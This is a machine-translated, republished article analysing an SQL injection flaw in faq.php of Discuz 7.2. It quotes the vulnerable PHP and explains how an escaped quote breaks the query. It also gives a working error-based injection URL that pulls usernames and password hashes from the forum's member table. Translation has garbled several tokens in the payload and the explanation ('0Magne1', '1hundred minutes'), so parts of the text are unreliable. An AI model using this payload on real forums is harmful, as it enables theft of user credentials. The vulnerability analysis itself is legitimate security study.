Shulou(Shulou.com)06/03 Report--

This article mainly introduces "how to analyze faq.php SQL injection vulnerabilities in Discuz7.2 version". In daily operation, I believe many people have doubts about how to analyze Discuz7.2 version of faq.php SQL injection vulnerabilities. Xiaobian consulted all kinds of materials and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the doubts of "how to analyze Discuz7.2 version of faq.php SQL injection vulnerabilities". Next, please follow the editor to study!

Injection code example:

The copy code is as follows:

Https://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count (*), concat ((select (select (select concat (username,0x20,password) from cdb_members limit 0Magne1)) from `information_ schema`.tables limit 0Magi 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) 23

Vulnerability analysis: by phithon

The copy code is as follows:

($action = = 'grouppermission') {

...

Ksort ($gids)

$groupids = array ()

Foreach ($gids as $row) {

$groupids [] = $row [0]

}

$query = $db- > query ("SELECT * FROM {$tablepre} usergroups u LEFT JOIN {$tablepre} admingroups an ON u.groupid=a.admingid WHERE u.groupid IN (" .implodeids ($groupids). "))

...

}

Function implodeids ($array) {

If (! empty ($array)) {

Return "'" .implode ("','", is_array ($array)? $array: array ($array). "'"

} else {

Return''

}

}

First define an array groupids, then iterate through $gids (this is also an array, that is, $_ GETs [gids]), taking the first bit of all the values in the array and putting them in the groupids.

Why does this operation result in injection?

Discuz will addslashes escape the GET array globally, that is, it will escape 'into\', so if our passed parameter is: gids [1] =', it will be escaped to $gids [1] =\', and the assignment statement $groupids [] = $row [0] is equivalent to taking the first character of the string, that is,\, to take out the escape symbol.

Looking back, he uses implodeids to process the data before putting it into the sql statement. We see the implodeids function

It's a simple function that splits the $groupids array with','to return a string similar to'1','2','3', and 4'.

But our array just took out an escape character, which escapes a normal 'here, like this:

'1hundred minutes', 'three minutes' and four.

Do you see any difference? the fourth single quote is escaped, that is, the fifth single quote and the third single quote are closed.

At this point, the study on "how to analyze faq.php SQL injection vulnerabilities in the Discuz7.2 version" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.